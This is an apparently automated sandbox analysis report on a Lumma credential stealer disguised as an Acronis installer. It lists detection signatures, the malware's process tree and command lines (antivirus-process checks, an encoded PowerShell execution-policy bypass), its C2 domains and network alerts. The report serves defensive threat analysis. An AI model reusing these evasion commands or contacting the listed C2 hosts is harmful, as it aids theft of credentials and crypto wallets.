Windows Analysis Report
acronis recovery expert deluxe 1.0.0.132.rarl.exe

Overview

General Information

Sample name: acronis recovery expert deluxe 1.0.0.132.rarl.exe
Analysis ID: 1579835
MD5: 2c83fb776a9e238d88e32393f17ae06a
SHA1: d74323c285d31ecd483e25c86e21222ca38ab227
SHA256: cb9670d377d8e1d3c11c63dc0e87f02339723ab2d88d10425a905437f6edb5a3

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64_ra
  • acronis recovery expert deluxe 1.0.0.132.rarl.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe" MD5: 2C83FB776A9E238D88E32393F17AE06A)
    • cmd.exe (PID: 6272 cmdline: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6668 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6620 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5948 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4692 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5744 cmdline: cmd /c md 650429 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 2864 cmdline: findstr /V "GERMANY" False MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6148 cmdline: cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Palestine.com (PID: 6176 cmdline: Palestine.com D MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 4540 cmdline: powershell -exec bypass -ENc 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 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • msn.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe" MD5: 537915708FE4E81E18E99D5104B353ED)
        • 5RLYIRN4B2NNKHJ11UTSZ2.exe (PID: 5288 cmdline: "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" MD5: 0EFDBBF3F5074D596D3E61446B623942)
          • 5RLYIRN4B2NNKHJ11UTSZ2.tmp (PID: 3840 cmdline: "C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$50362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" MD5: D8F3F93349755C2BD326DF91966FD6F5)
            • 5RLYIRN4B2NNKHJ11UTSZ2.exe (PID: 2092 cmdline: "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT MD5: 0EFDBBF3F5074D596D3E61446B623942)
              • 5RLYIRN4B2NNKHJ11UTSZ2.tmp (PID: 4956 cmdline: "C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$60362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT MD5: D8F3F93349755C2BD326DF91966FD6F5)
                • cmd.exe (PID: 2876 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 3560 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3928 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 5760 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 4332 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 4456 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 4936 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 4516 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 5132 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 3744 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5796 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 6444 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 6372 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5860 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 4992 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 5316 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 4308 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 1084 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • electronics.exe (PID: 4596 cmdline: "C:\Users\user\AppData\Roaming\Panorado\\electronics.exe" "C:\Users\user\AppData\Roaming\Panorado\\crooners.eml" MD5: 3F58A517F1F4796225137E7659AD2ADB)
      • choice.exe (PID: 6180 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • rundll32.exe (PID: 6352 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • acronis recovery expert deluxe 1.0.0.132.rarl.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe" MD5: 2C83FB776A9E238D88E32393F17AE06A)
    • cmd.exe (PID: 6344 cmdline: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3348 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6616 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3816 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2532 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5484 cmdline: cmd /c md 650429 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 1036 cmdline: cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Palestine.com (PID: 6148 cmdline: Palestine.com D MD5: 62D09F076E6E0240548C2F837536A46A)
        • V2DDYDPIWYUTCJYUB0IV5.exe (PID: 6540 cmdline: "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" MD5: 0EFDBBF3F5074D596D3E61446B623942)
          • V2DDYDPIWYUTCJYUB0IV5.tmp (PID: 3424 cmdline: "C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$6036C,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" MD5: D8F3F93349755C2BD326DF91966FD6F5)
            • V2DDYDPIWYUTCJYUB0IV5.exe (PID: 3940 cmdline: "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT MD5: 0EFDBBF3F5074D596D3E61446B623942)
              • V2DDYDPIWYUTCJYUB0IV5.tmp (PID: 816 cmdline: "C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$80362,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT MD5: D8F3F93349755C2BD326DF91966FD6F5)
      • choice.exe (PID: 1360 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["necklacebudi.lat", "aspecteirs.lat", "sustainskelet.lat", "shearhoaxx.click", "grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "rapeflowwj.lat", "discokeyus.lat"], "Build id": "Ol1wEfA--w"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000027.00000002.2156116548.000000000974A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
Process Memory Space: Palestine.com PID: 6176 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: Palestine.com PID: 6176 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Palestine.com PID: 6148 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: Palestine.com PID: 6148 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source | Rule | Description | Author | Strings
amsi32_4540.amsi.csv | SUSP_Obfuscted_PowerShell_Code | Detects obfuscated PowerShell Code | Florian Roth | see matches below
  • 0xb1f6:$s1: ').Invoke(
  • 0xb2c3:$s1: ').Invoke(
  • 0xb39b:$s1: ').Invoke(
  • 0xb3c4:$s1: ').Invoke(
  • 0xb41b:$s1: ').Invoke(
  • 0xb544:$s1: ').Invoke(
  • 0xb5cf:$s1: ').Invoke(
  • 0xb614:$s1: ').Invoke(
  • 0xb701:$s1: ').Invoke(
  • 0xb77a:$s1: ').Invoke(
  • 0xb7ce:$s1: ').Invoke(
  • 0xb7fd:$s1: ').Invoke(
  • 0xc564:$s1: ').Invoke(
  • 0xc631:$s1: ').Invoke(
  • 0xc709:$s1: ').Invoke(
  • 0xc732:$s1: ').Invoke(
  • 0xc789:$s1: ').Invoke(
  • 0xc8b2:$s1: ').Invoke(
  • 0xc93d:$s1: ').Invoke(
  • 0xc982:$s1: ').Invoke(
  • 0xca6f:$s1: ').Invoke(

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: powershell -exec bypass -ENc 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
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4540, TargetFilename: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Data.Entity.Design.dll
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe", ParentImage: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe, ParentProcessId: 7144, ParentProcessName: acronis recovery expert deluxe 1.0.0.132.rarl.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd, ProcessId: 6272, ProcessName: cmd.exe
Source: Process started; Author: frack113; Data: Command: powershell -exec bypass -ENc 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
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -exec bypass -ENc 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

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6272, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 4692, ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T10:35:29.900273+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49701 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:31.902946+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49702 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:34.403283+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49703 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:36.708516+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49704 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:39.155246+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49705 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:41.501174+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49706 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:44.561219+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49707 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:47.430212+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49708 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:50.025436+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49709 | 172.67.182.135 | 443 | TCP
2024-12-23T10:35:52.533661+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49710 | 45.66.248.134 | 443 | TCP
2024-12-23T10:36:04.160666+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49713 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:06.433805+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49714 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:08.927664+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49715 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:11.225911+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49716 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:13.871555+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49717 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:16.247344+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49718 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:18.521402+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49719 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:21.021576+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49720 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:22.922853+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49721 | 172.67.182.135 | 443 | TCP
2024-12-23T10:36:24.194307+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49722 | 45.66.248.134 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T10:35:30.680014+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.16 | 49701 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:32.670883+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.16 | 49702 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:48.489015+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.16 | 49708 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:05.216655+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.16 | 49713 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:07.234528+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.16 | 49714 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:21.780501+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.16 | 49720 | 172.67.129.49 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T10:35:30.680014+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.16 | 49701 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:05.216655+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.16 | 49713 | 172.67.129.49 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T10:35:32.670883+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.16 | 49702 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:07.234528+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.16 | 49714 | 172.67.129.49 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T10:35:42.313661+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49706 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:12.366139+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49716 | 172.67.129.49 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T10:35:44.565019+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.16 | 49707 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:18.525635+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.16 | 49719 | 172.67.129.49 | 443 | TCP

AV Detection

Source: Palestine.com.6176.17.memstrmin; Malware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "aspecteirs.lat", "sustainskelet.lat", "shearhoaxx.click", "grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "rapeflowwj.lat", "discokeyus.lat"], "Build id": "Ol1wEfA--w"}
Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msncore.dll; ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe; ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe; ReversingLabs: Detection: 18%

Exploits

Source: Yara match; File source: 00000027.00000002.2156116548.000000000974A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: acronis recovery expert deluxe 1.0.0.132.rarl.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dll
Source: unknown; HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.182.135:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 45.66.248.134:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.35.89:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: acronis recovery expert deluxe 1.0.0.132.rarl.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Jenkins\workspace\AC_KillProcess\x64\Release\KillProcess.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\4\s\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGAManufacturerLib\x64\Release\VGAManufacturerLib.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\x64\Release\ServiceUninstall.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGATypeLib\x64\Release\VGATypeLib.pdb)); source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\openssl-1.1.1j\libcrypto-1_1-x64.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000903C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\CPUManufacturerCmdLib\x64\Release\CPUManufacturerCmdLib.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VideoMemoryLib\x64\Release\VideoMemoryLib.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGAManufacturerLib\x64\Release\VGAManufacturerLib.pdb)); source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msidcrl40.pdb; source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: msidcrl40.pdbL; source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp
